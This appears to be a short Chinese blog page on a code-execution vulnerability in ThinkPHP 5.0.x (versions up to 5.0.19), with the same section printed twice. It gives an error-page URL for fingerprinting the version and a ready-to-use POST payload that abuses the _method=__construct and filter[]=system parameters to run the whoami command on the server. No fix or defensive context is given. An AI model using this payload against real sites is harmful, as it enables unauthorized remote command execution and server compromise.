ThinkPHP_5.0.13_代碼執行漏洞

# ThinkPHP 5.0.13 代碼執行漏洞

==影響版本==
ThinkPHP <= v5.0.19 ==漏洞利用==
通過報錯確定ThinkPHP版本:

http://127.0.0.1/tk5/public/index.php/111

==Payload==

http://127.0.0.1/tk5/public/index.php
post發送數據:
s=whoami&_method=__construct&method=&filter[]=system


==影響版本==
ThinkPHP <= v5.0.19 ==漏洞利用==

通過報錯確定ThinkPHP版本:

http://127.0.0.1/tk5/public/index.php/111

==Payload==

http://127.0.0.1/tk5/public/index.php

post發送數據:
s=whoami&_method=__construct&method=&filter[]=system
© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容